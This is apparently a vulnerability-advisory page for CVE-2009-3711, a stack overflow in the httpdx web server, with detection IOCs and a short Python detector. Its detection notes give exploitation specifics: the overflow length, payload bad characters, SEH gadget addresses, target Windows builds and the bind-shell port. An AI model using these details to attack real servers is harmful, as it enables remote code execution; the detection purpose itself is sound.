CVE-2009-3711
published 2009-10-16
Priority: P2 65 · Severity: critical · CVSS 2.0 score: 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Tags: EXPLOIT
EPSS: 63.91% (99.1th percentile)
Stack-based buffer overflow in the h_handlepeer function in http.cpp in httpdx 1.4, and possibly 1.4.3, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request.

Affected (2 ranges)

Vendor   Product   Version range   Fixed in
jasper   httpdx    -               -
jasper   httpdx    -               -

Detection & IOCs (extracted from sources)

command: GET /abc=AAAA...A HTTP/1.1 Host: 192.168.2.1
port: 58821
other: 0x63b81a07
other: 0x63b80131
path: httpdx_src/http.cpp
  • Detect exploitation attempts by matching HTTP GET requests with abnormally long URI paths (more than 476 bytes) sent to httpdx servers; the excess length is consistent with buffer-overflow padding.
  • Fingerprint a vulnerable httpdx server by matching its Server banner against the pattern /httpdx\/.* \(Win32\)/; the Metasploit check method uses this banner to confirm the vulnerability.
  • Monitor for unexpected network activity on port 58821 from the httpdx process after it receives a malformed GET request; this is the port opened by the exploit's bind shellcode.
  • The exploit sets VHOST to an empty string and sends a crafted sploit URI, so an empty Host header combined with an oversized GET URI targeting httpdx is a strong indicator.
  • The bad characters for payload encoding are \x00\x0a\x0d\x20\x25\x2e\x2f\x3f\x5c; use these to tune IDS rules so that encoded variants do not produce false negatives.
  • The overflow occurs in the strcpy call that copies client->filereq into a stack buffer; in memory forensics, look for SEH-based exploitation patterns (the pop/pop/ret gadget at 0x63b81a07 in n.dll).
  • The Metasploit module targets only Windows platforms (XP SP3 and 2003 SP2 English); the SEH ROP gadget addresses (0x63b81a07, 0x63b80131) are specific to n.dll on those OS versions and will differ on other builds.
  • The NVD entry notes that httpdx 1.4.3 may also be vulnerable ("possibly 1.4.3"), so detection should not be limited to version 1.4.
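The following is an added example, not code from the page's sources or from the Metasploit module: a small Python check that applies the detection rules above (GET URI longer than 476 bytes, empty Host header) to raw HTTP requests, and the banner regex to a Server header. The threshold and regex are the ones stated above; the sample requests are constructed for the example.

```python
import re

# Threshold and banner pattern taken from the detection notes above.
MAX_URI_LEN = 476
HTTPDX_BANNER = re.compile(r"httpdx/.* \(Win32\)")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, uri, headers).
    Returns None when the request line is malformed."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    method, uri, _version = parts
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def flag_request(raw: bytes) -> list:
    """Return the reasons a request matches the CVE-2009-3711 indicators."""
    parsed = parse_request(raw)
    if parsed is None:
        return ["malformed request line"]
    method, uri, headers = parsed
    reasons = []
    if method == "GET" and len(uri) > MAX_URI_LEN:
        reasons.append(f"oversized GET URI ({len(uri)} bytes > {MAX_URI_LEN})")
    if headers.get("host") == "":
        reasons.append("empty Host header")
    return reasons


def is_httpdx_banner(server_header: str) -> bool:
    """True when a Server header matches the vulnerable httpdx banner pattern."""
    return HTTPDX_BANNER.search(server_header) is not None


# Constructed sample traffic (not captured from a real exploit).
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: 192.168.2.1\r\n\r\n"
SUSPECT = b"GET /abc=" + b"A" * 600 + b" HTTP/1.1\r\nHost: \r\n\r\n"

if __name__ == "__main__":
    for req in (BENIGN, SUSPECT):
        print(flag_request(req))
```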